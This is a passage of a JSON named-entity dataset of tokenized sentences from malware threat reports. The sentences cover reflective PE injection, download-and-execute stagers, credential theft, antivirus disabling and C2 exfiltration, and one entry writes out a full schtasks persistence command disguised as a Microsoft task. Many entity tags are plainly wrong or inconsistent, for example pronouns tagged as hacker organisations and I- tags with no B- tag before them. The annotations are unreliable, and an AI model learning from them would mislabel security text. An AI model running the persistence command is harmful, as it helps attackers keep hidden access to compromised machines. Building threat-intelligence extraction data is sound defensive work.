"O", "O", "O", "O", "O" ] }, { "tokens": [ "reflective", "PE", "injection", "allows", "the", "malware", "to", "load", "and", "execute", "its", "code", "directly", "from", "memory" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "reflective", "PE", "injection,", "the", "PE", "file", "is", "parsed", "and", "its", "sections", "are", "reconstructed", "in", "the", "target", "process’s", "memory." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "-ReflectivePEInjection”", "that", "facilitates", "reflective", "PE", "injection", "using", "PowerShell." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "B-SamFile" ] }, { "tokens": [ "This", "module", "allows", "the", "injection", "of", "a", "PE", "file", "into", "a", "remote", "or", "local", "process’s", "memory", "without", "writing", "it", "to", "disk" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "the", "PE", "file", "is", "injected", "and", "reconstructed", "in", "memory,", "the", "execution", "flow", "can", "be", "redirected", "to", "the", "injected", "code,", "enabling", "the", "malware", "to", "operate", "within", "the", "context", "of", "the", "compromised", "process." ], "ner_tags": [ "O", "O", "B-Tool", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PE", "reflective", "injection." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "PE", "file", "is", "downloaded", "on", "filesystem", "and", "than", "executed." ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "the", "DownloadFile", "method", "of", "the", "WebClient", "object", "to", "download", "the", "file", "from", "the", "specified", "URL", "and", "save", "it", "to", "the", "specified", "local", "file", "path." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "file", "to", "be", "downloaded." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "script", "that", "downloads", "a", "file", "from", "a", "fixed", "location", "and", "executes", "it." ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShell", "one-liner", "that", "can", "be", "used", "to", "download", "and", "execute", "a", "remote", ".ps1", "or", ".exe", "file:" ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "using", "LNK", "files", "to", "download", "malware", "or", "other", "malicious", "files", "by", "leveraging", "legitimate", "native", "apps,", "such", "as", "PowerShell." ], "ner_tags": [ "O", "B-Way", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "simple", "stager", "download", "of", "an", ".exe", "file", "and", "its", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "This", "line", "uses", "the", "ShellExecute", "method", "of", "the", "Shell.Application", "object", "to", "execute", "the", "downloaded", "file." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Shell.Application", "object", "provides", "methods", "for", "working", "with", "the", "Windows", "shell" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypt" ], "ner_tags": [ "O" ] }, { "tokens": [ "This", "decryption", "process", "utilizes", "the", "Fernet", "algorithm" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "The", "script", "will", "download", "and", "decrypt", "the", "string", "that", "represents", "the", "token" ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "fernet_decrypt", "function", "decrypts", "an", "encrypted", "string" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "returns", "the", "decrypted", "message", "as", "a", "decoded", "string." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "use", "the", "harcoded", "password", "for", "decryption", "using", "the", "fernet_decrypt", "function,", "and", "returns", "the", "decrypted", "AUTH", "Token." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam", "B-Tool", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "the", "file", "will", "be", "deleted" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "access", "to", "system", "APIs," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "It", "uses", "the", "win32api.GetDiskFreeSpaceEx()", "function" ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Fernet", "is", "a", "symmetric", "encryption", "algorithm", "and", "token", "format", "used", "for", "secure", "communication", "and", "data", "protection" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "I-Features", "I-Features" ] }, { "tokens": [ "It", "utilizes", "symmetric", "key", "cryptography,", "where", "the", "same", "secret", "key", "is", "used", "for", "both", "encryption", "and", "decryption" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "this", "code", "comparing", "the", "local", "IP", "address", "with", "a", "predefined", "list", "of", "network", "addresses" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "obfuscation", "mechanisms", "during", "the", "compilation", "process." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "injected", "code" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "local", "disk", "volumes", "to", "be", "encrypted", "are", "also", "configured", "in", "a", "similar", "manner." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "addition", "to", "file", "encryption", "and", "obfuscation," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "(crawl", "whole", "tree),", "I:,", "H:,", "G:,", "F:,", "E:,", "and", "D:." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "malware", "will", "attempt", "to", "gather", "specific,", "sensitive", "information", "from", "targeted", "systems." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "B-Purp", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "the", "dropper", "is", "distributed", "in", "the", "form", "of", "a", "UPX-packed", "DLL" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "The", "malware", "then", "abuses", "the", "MSDTC", "service,", "manipulating", "the", "permissions", "and", "startup", "parameters." ], "ner_tags": [ "O", "B-SamFile", "O", "B-Features", "O", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "its", "abuse", "of", "the", "legitimate", "MSDTC", "service," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "malicious", "oci.dll", "into", "the", "service’s", "executable" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "its", "attempts", "to", "steal", "credentials", "and", "browser", "data." ], "ner_tags": [ "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "This", "includes", "browser", "session", "and", "credential", "data." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Credential", "and", "Browser", "Data", "Theft" ], "ner_tags": [ "B-Org", "O", "O", "O", "O" ] }, { "tokens": [ "It", "checks", "that", "there", "are", "no", "running", "processes", "related", "to", "security-related", "software", "(e.g.,", "Windbg,", "Autoruns,", "Wireshark)" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way" ] }, { "tokens": [ "It", "checks", "that", "there", "are", "no", "drivers", "loaded", "from", "security-related", "software", "(e.g.,", "groundling32.sys)" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "checks", "that", "the", "status", "of", "certain", "services", "belonging", "to", "security-related", "software", "meets", "certain", "conditions", "(e.g.,", "windefend,", "sense,", "cavp)" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Like", "the", "domain,", "the", "URI", "is", "composed", "using", "a", "set", "of", "hardcoded", "keywords", "and", "paths,", "which", "are", "chosen", "partly", "at", "random", "and", "partly", "based", "on", "the", "type", "of", "HTTP", "request", "that", "is", "being", "sent", "out." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DeleteFile" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "deleting", "files" ], "ner_tags": [ "B-SamFile", "B-Features" ] }, { "tokens": [ "ReadRegistryValue" ], "ner_tags": [ "O" ] }, { "tokens": [ "GetRegistrySubKeyAndValueNames" ], "ner_tags": [ "B-Way" ] }, { "tokens": [ "enumerate", "files", "and", "registry", "keys" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O" ] }, { "tokens": [ "The", "content", "of", "the", "MachineGuid", "registry", "value", "from", "the", "key", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "DeleteRegistryValue" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "SetRegistryValue" ], "ner_tags": [ "O" ] }, { "tokens": [ "manipulating", "of", "registry", "keys" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "GetProcessByDescription" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "enumerate", "processes" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "The", "command", "CollectSystemDescription", "retrieves", "the", "following", "information:", "Local", "Computer", "Domain", "name", "Administrator", "Account", "SID", "HostName" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "OS", "Version" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "The", "domain", "name", "of", "the", "device" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Username" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "System", "Directory" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "To", "avoid", "detection,", "attackers", "renamed", "Windows", "administrative", "tools", "like", "adfind.exe", "which", "were", "then", "used", "for", "domain", "enumeration" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Purp" ] }, { "tokens": [ "schtasks", "/create", "/F", "/tn", "“\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager”", "/tr", "“C:\\Windows\\SoftwareDistribution\\EventCacheManager.exe”", "/sc", "ONSTART", "/ru", "system", "/" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "C:\\Windows\\system32\\cmd.exe", "/C" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "With", "Rundll32," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "collect", "and", "upload", "information", "about", "the", "device" ], "ner_tags": [ "B-Features", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "to", "report", "some", "basic", "information", "about", "the", "compromised", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "ability", "to", "log", "keystrokes" ], "ner_tags": [ "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "keystrokes" ], "ner_tags": [ "O" ] }, { "tokens": [ "logs", "keystrokes" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "capture", "screenshots," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "“The", "reconnaissance", "data", "is", "exfiltrated", "to", "the", "attacker-controlled", "server", "through", "an", "HTTP", "POST", "request" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "attacker-controlled", "server", "through", "an", "HTTP", "POST", "request" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "send", "phishing", "emails", "with", "malicious", "HTML", "attachments" ], "ner_tags": [ "O", "B-Way", "I-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "operating", "system", "information" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "collecting", "system", "information", "such", "as", "hostnames" ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "OS", "version", "information" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "run", "the", "payloads", "by", "sideloading", "them", "to", "the", "legitimate", "executables" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "insights", "on", "anti-virus", "software", "present", "on", "the", "machine" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "downloading", "and", "executing", "two", "other", "PowerShell", "scripts", "from", "a", "different", "attacker-controlled", "server" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "IPv4", "addresses" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "“The", "banking", "trojan", "targets", "the", "victim’s", "sensitive", "information" ], "ner_tags": [ "O", "B-Idus", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "user", "credentials", "have", "been", "compromised,", "this", "tool", "takes", "“full", "control”", "of", "the", "account" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "“When", "a", "victim", "opens", "the", "HTML", "file", "attachment,", "an", "embedded", "URL", "is", "launched", "in", "the", "victim’s", "browser,", "redirecting", "to", "another", "malicious", "HTML", "file", "from", "an", "attacker-controlled", "AWS", "EC2", "instance" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Identify", "processes" ], "ner_tags": [ "O", "B-Features" ] }, { "tokens": [ "Logged", "Processes" ], "ner_tags": [ "O", "B-SecTeam" ] }, { "tokens": [ "Identify", "processes", "related", "to", "backups,", "antivirus/anti-spyware," ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "actors", "have", "also", "gained", "initial", "access", "to", "victim", "networks", "by", "distributing", "phishing", "emails", "with", "malicious", "attachments" ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "by", "exploiting", "the", "following", "vulnerabilities", "against", "Microsoft", "Exchange", "servers" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "removes", "virus", "definitions", "and", "disables", "all", "portions", "of", "Windows", "Defender", "and", "other", "common", "antivirus", "programs", "in", "the", "system", "registry" ], "ner_tags": [ "I-Features", "I-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Microsoft", "Windows", "Defender", "AntiVirus", "Protection", "disabled" ], "ner_tags": [ "O", "O", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "Microsoft", "Windows", "Defender", "AntiSpyware", "Protection", "disabled" ], "ner_tags": [ "O", "O", "I-SecTeam", "O", "O", "O" ] }, { "tokens": [ "Microsoft", "Exchange", "Server", "Privilege", "Escalation", "Vulnerability" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Exp" ] }, { "tokens": [ "remove", "all", "existing", "shadow", "copies", "via", "vssadmin", "on", "command", "line" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "This", "could", "cause", "the", "file", "to", "run", "when", "double-clicked", "instead", "of", "opening", "it", "with", "a", "PDF", "viewer." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "and", "then", "downloads", "a", "second-stage", "backdoor", "from", "the", "OpenDrive", "cloud", "service." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "decryption", "routine", "shared", "between", "the", "BADCALL", "for", "Linux", "and", "targeted", "destructive", "malware", "for", "Windows", "from", "2014" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-OffAct", "I-OffAct", "O", "O", "O", "B-Time" ] }, { "tokens": [ "uses", "the", "same", "type", "of", "strong", "encryption", "–", "AES-GCM" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "creates", "a", "scheduled", "task", "on", "the", "system", "that", "provides", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creates", "a", "scheduled", "task", "on", "the", "system", "that", "provides", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creates", "a", "scheduled", "task", "on", "the", "system", "that", "provides", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "establishes", "persistence", "by", "creating", "an", "autostart", "service", "that", "allows", "it", "to", "run", "whenever", "the", "machine", "boots." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "establishes", "persistence", "by", "creating", "an", "autostart", "service", "that", "allows", "it", "to", "run", "whenever", "the", "machine", "boots." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decodes", "the", "configuration", "data", "and", "modules." ], "ner_tags": [ "B-Features", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "injects", "into", "the", "svchost.exe", "process." ], "ner_tags": [ "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "injects", "into", "the", "svchost.exe", "process" ], "ner_tags": [ "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "malicious", "actors", "spread", "primarily", "by", "spearphishing", "campaigns", "using", "tailored", "emails", "that", "contain", "malicious", "attachments" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "has", "used", "an", "email", "with", "an", "Excel", "sheet", "containing", "a", "malicious", "macro", "to", "deploy", "the", "malware." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "compromised", "server", "that", "prompts", "the", "victim", "to", "click" ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "clicking", "the", "photo,", "the", "victim", "unknowingly", "downloads", "a", "malicious", "JavaScript", "file", "that" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "has", "attempted", "to", "get", "users", "to", "launch", "malicious", "documents", "to", "deliver", "its", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "spread", "the", "malware", "laterally", "across", "a", "network", "by", "abusing", "the", "Server", "Message", "Block", "(SMB)", "Protocol." ], "ner_tags": [ "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O" ] }, { "tokens": [ "modules", "spread", "the", "malware", "laterally", "across", "a", "network", "by", "abusing", "the", "SMB", "Protocol." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "data", "exfiltration", "over", "a", "hardcoded", "C2", "server" ], "ner_tags": [ "I-Purp", "I-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "send", "information", "about", "the", "compromised", "host", "to", "a", "hardcoded", "C2", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "the", "Windows", "Application", "Programming", "Interface", "(API)", "call,", "CreateProcessW(),", "to", "manage", "execution", "flow." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "I-Features", "O" ] }, { "tokens": [ "by", "capturing", "the", "CredEnumerateA", "API." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "by", "capturing", "the", "CredEnumerateA", "API." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "leveraging", "Microsoft’s", "CryptoAPI" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "uses", "an", "AES", "CBC", "(256", "bits)", "encryption", "algorithm", "for", "its", "loader", "and", "configuration", "files." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "leverages", "a", "custom", "packer", "to", "obfuscate", "its", "functionality." ], "ner_tags": [ "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "can", "modify", "registry", "entries" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "can", "disable", "Windows", "Defender." ], "ner_tags": [ "O", "O", "O", "B-Org" ] }, { "tokens": [ "can", "obtain", "passwords", "stored", "in", "files", "from", "several", "applications", "such", "as", "Outlook,", "Filezilla,", "OpenSSH,", "OpenVPN", "and", "WinSCP." ], "ner_tags": [ "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "it", "searches", "for", "the", ".vnc.lnk", "affix", "to", "steal", "VNC", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "can", "obtain", "passwords", "stored", "in", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "by", "querying", "the", "Software\\SimonTatham\\Putty\\Sessions", "registry", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "obtains", "the", "IP", "address,", "location,", "and", "other", "relevant", "network", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "identify", "the", "user", "and", "groups", "the", "user", "belongs", "to", "on", "a", "compromised", "host." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gathers", "the", "OS", "version,", "machine", "name,", "CPU", "type,", "amount", "of", "RAM", "available", "from", "the", "victim’s", "machine" ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "searches", "the", "system", "for", "all", "of", "the", "following", "file", "extensions:", ".avi,", ".mov,", ".mkv,", ".mpeg,", ".mpeg4,", ".mp4,", ".mp3,", ".wav,", ".ogg,", ".jpeg,", ".jpg,", ".png,", ".bmp,", ".gif,", ".tiff,", ".ico,", ".xlsx,", "and", ".zip." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "collects", "local", "files", "and", "information", "from", "the", "victim’s", "local", "machine." ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "HTTPS", "to", "communicate", "with", "its", "C2", "servers" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "samples", "have", "used", "HTTP", "over", "ports", "447", "and", "8082", "for", "C2." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "downloads", "several", "additional", "files", "and", "saves", "them", "to", "the", "victim's", "machine." ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "a", "custom", "crypter", "leveraging", "Microsoft’s", "CryptoAPI", "to", "encrypt", "C2", "traffic." ], "ner_tags": [ "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features" ] } ]